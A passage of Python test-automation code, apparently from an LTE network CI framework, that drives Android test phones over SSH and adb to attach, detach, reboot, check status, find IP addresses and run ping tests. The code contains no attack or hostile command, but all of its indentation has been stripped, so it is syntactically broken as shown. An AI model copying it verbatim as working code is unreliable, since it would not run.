SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
self.UEDevicesStatus[nb_ue_to_connect] = CONST.UE_STATUS_ATTACHING
p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,nb_ue_to_connect,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
HTML.CreateHtmlTestRow('N/A', 'KO', CONST.ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
return
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
cnt = 0
while cnt < len(self.UEDevices):
if self.UEDevicesStatus[cnt] == CONST.UE_STATUS_ATTACHING:
self.UEDevicesStatus[cnt] = CONST.UE_STATUS_ATTACHED
cnt += 1
HTML.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(RAN.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
HTML.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def DetachUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
#RH quick add on to integrate cots control defined by yaml
#if device id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode ON (ie Radio OFF)
COTS_UE.Set_Airplane(device_id,'ON')
elif device_id == '84B7N16418004022':
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
cnt = 0
for device_id in self.UEDevices:
self.UEDevicesStatus[cnt] = CONST.UE_STATUS_DETACHING
p = Process(target = self.DetachUE_common, args = (device_id,cnt,))
p.daemon = True
p.start()
multi_jobs.append(p)
cnt += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
result = re.search('T_stdout', str(RAN.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus[cnt] = CONST.UE_STATUS_DETACHED
cnt += 1
def RebootUE_common(self, device_id):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', SSH.getBefore())
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
while count > 0:
count = count - 1
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', SSH.getBefore())
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
HTML.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def DataDisableUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# disable data service
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data disable"', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data disable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Disabled Data Service\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataDisableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataDisableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def DataEnableUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Enabled Data Service\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataEnableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataEnableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
SSH.command('adb devices', '\$', 15)
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",SSH.getBefore())
SSH.close()
else:
if (os.path.isfile('./phones_list.txt')):
os.remove('./phones_list.txt')
SSH.command('ls /etc/*/phones*.txt', '\$', 5)
result = re.search('/etc/ci/phones_list.txt', SSH.getBefore())
SSH.close()
if (result is not None) and (len(self.UEDevices) == 0):
SSH.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, '/etc/ci/phones_list.txt', '.')
if (os.path.isfile('./phones_list.txt')):
phone_list_file = open('./phones_list.txt', 'r')
for line in phone_list_file.readlines():
line = line.strip()
result = re.search('^#', line)
if result is not None:
continue
comma_split = line.split(",")
self.UEDevices.append(comma_split[0])
self.UEDevicesRemoteServer.append(comma_split[1])
self.UEDevicesRemoteUser.append(comma_split[2])
self.UEDevicesOffCmd.append(comma_split[3])
self.UEDevicesOnCmd.append(comma_split[4])
self.UEDevicesRebootCmd.append(comma_split[5])
phone_list_file.close()
if terminate_ue_flag == True:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
if len(self.UEDevicesStatus) == 0:
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus.append(CONST.UE_STATUS_DETACHED)
cnt += 1
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
SSH.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
#self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",SSH.getBefore())
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",SSH.getBefore())
else:
if (os.path.isfile('./modules_list.txt')):
os.remove('./modules_list.txt')
SSH.command('ls /etc/*/modules*.txt', '\$', 5)
result = re.search('/etc/ci/modules_list.txt', SSH.getBefore())
SSH.close()
if result is not None:
logging.debug('Found a module list file on ADB server')
if terminate_ue_flag == True:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
SSH.close()
def CheckUEStatus_common(self, lock, device_id, statusQueue, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry"', '\$', 15)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\'', '\$', 60)
result = re.search('mServiceState=(?P<serviceState>[0-9]+)', SSH.getBefore())
serviceState = 'Service State: UNKNOWN'
if result is not None:
lServiceState = int(result.group('serviceState'))
if lServiceState == 3:
serviceState = 'Service State: RADIO_POWERED_OFF'
if lServiceState == 1:
serviceState = 'Service State: OUT_OF_SERVICE'
if lServiceState == 0:
serviceState = 'Service State: IN_SERVICE'
if lServiceState == 2:
serviceState = 'Service State: EMERGENCY_ONLY'
result = re.search('mDataConnectionState=(?P<dataConnectionState>[0-9]+)', SSH.getBefore())
dataConnectionState = 'Data State: UNKNOWN'
if result is not None:
lDataConnectionState = int(result.group('dataConnectionState'))
if lDataConnectionState == 0:
dataConnectionState = 'Data State: DISCONNECTED'
if lDataConnectionState == 1:
dataConnectionState = 'Data State: CONNECTING'
if lDataConnectionState == 2:
dataConnectionState = 'Data State: CONNECTED'
if lDataConnectionState == 3:
dataConnectionState = 'Data State: SUSPENDED'
result = re.search('mDataConnectionReason=(?P<dataConnectionReason>[0-9a-zA-Z_]+)', SSH.getBefore())
dataConnectionReason = 'Data Reason: UNKNOWN'
if result is not None:
dataConnectionReason = 'Data Reason: ' + result.group('dataConnectionReason')
lock.acquire()
logging.debug('\u001B[1;37;44m Status Check (' + str(device_id) + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + serviceState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionReason + '\u001B[0m')
statusQueue.put(0)
statusQueue.put(device_id)
qMsg = serviceState + '\n' + dataConnectionState + '\n' + dataConnectionReason
statusQueue.put(qMsg)
lock.release()
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckStatusUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
HTML.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
lock = Lock()
status_queue = SimpleQueue()
i = 0
for device_id in self.UEDevices:
p = Process(target = self.CheckUEStatus_common, args = (lock,device_id,status_queue,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd /opt/flexran_rtc', '\$', 5)
SSH.command('curl http://localhost:9999/stats | jq \'.\' > log/check_status_' + self.testCase_id + '.log 2>&1', '\$', 5)
SSH.command('cat log/check_status_' + self.testCase_id + '.log | jq \'.eNB_config[0].UE\' | grep -c rnti | sed -e "s#^#Nb Connected UE = #"', '\$', 5)
result = re.search('Nb Connected UE = (?P<nb_ues>[0-9]+)', SSH.getBefore())
passStatus = True
if result is not None:
nb_ues = int(result.group('nb_ues'))
htmlOptions = 'Nb Connected UE(s) to eNB = ' + str(nb_ues)
logging.debug('\u001B[1;37;44m ' + htmlOptions + ' \u001B[0m')
if self.expectedNbOfConnectedUEs > -1:
if nb_ues != self.expectedNbOfConnectedUEs:
passStatus = False
else:
htmlOptions = 'N/A'
SSH.close()
else:
passStatus = True
htmlOptions = 'N/A'
if (status_queue.empty()):
HTML.CreateHtmlTestRow(htmlOptions, 'KO', CONST.ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
check_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
check_status = False
device_id = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
html_queue.put(html_cell)
if check_status and passStatus:
HTML.CreateHtmlTestRowQueue(htmlOptions, 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRowQueue(htmlOptions, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr:(?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|inet (?P<ueipaddress2>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', SSH.getBefore())
if result is not None:
if result.group('ueipaddress') is not None:
UE_IPAddress = result.group('ueipaddress')
else:
UE_IPAddress = result.group('ueipaddress2')
logging.debug('\u001B[1mUE (' + self.UEDevices[0] + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
self.UEIPAddresses.append(UE_IPAddress)
else:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
ue_ip_status -= 1
SSH.close()
return ue_ip_status
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
idx = 0
for device_id in self.UEDevices:
if self.UEDevicesStatus[idx] != CONST.UE_STATUS_ATTACHED:
idx += 1
continue
count = 0
while count < 4:
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "ip addr show | grep rmnet"', '\$', 15)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ip addr show | grep rmnet"\'', '\$', 60)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', SSH.getBefore())
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ': has already been allocated to another device !' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
idx += 1
SSH.close()
return ue_ip_status
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
# Launch ping on the EPC side (true for ltebox and old open-air-cn)
# But for OAI-Rel14-CUPS, we launch from python executor
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', EPC.Type, re.IGNORECASE):
launchFromEpc = False
ping_time = re.findall("-c (\d+)",str(self.ping_args))
if launchFromEpc:
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
SSH.command('cd scripts', '\$', 5)
ping_status = SSH.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
else:
cmd = 'ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 > ping_' + self.testCase_id + '_' + device_id + '.log'
message = cmd + '\n'
logging.debug(cmd)
ret = subprocess.run(cmd, shell=True)
ping_status = ret.returncode
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'ping_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cat ' + EPC.SourceCodePath + '/scripts/ping_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', SSH.getBefore())
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', SSH.getBefore())
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def PingNoS1_wrong_exit(self, qMsg):
html_queue = SimpleQueue()
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
def PingNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_from_eNB = re.search('oaitun_enb1', str(self.ping_args))
if ping_from_eNB is not None:
if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
else:
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
try:
if ping_from_eNB is not None:
SSH.open(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword)
SSH.command('cd ' + RAN.eNBSourceCodePath + '/cmake_targets/', '\$', 5)
else:
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets/', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = SSH.command('stdbuf -o0 ping ' + self.ping_args + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with OAI UE crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', SSH.getBefore())
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', SSH.getBefore())
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
logging.debug('\u001B[1;37;44m OAI UE ping result \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
SSH.close()
html_queue = SimpleQueue()
ip_addr = 'TBD'
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
if packetLossOK:
HTML.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
# copying on the EPC server for logCollection
if ping_from_eNB is not None:
copyin_res = SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
else:
copyin_res = SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
if (copyin_res == 0):
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'ping_' + self.testCase_id + '.log', EPC.SourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Ping(self):
result = re.search('noS1', str(RAN.Initialize_eNB_args))
if result is not None:
self.PingNoS1()
return
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
HTML.CreateHtmlTestRow(self.ping_args, 'KO', CONST.UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
HTML.CreateHtmlTestRow(self.ping_args, 'KO', CONST.ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
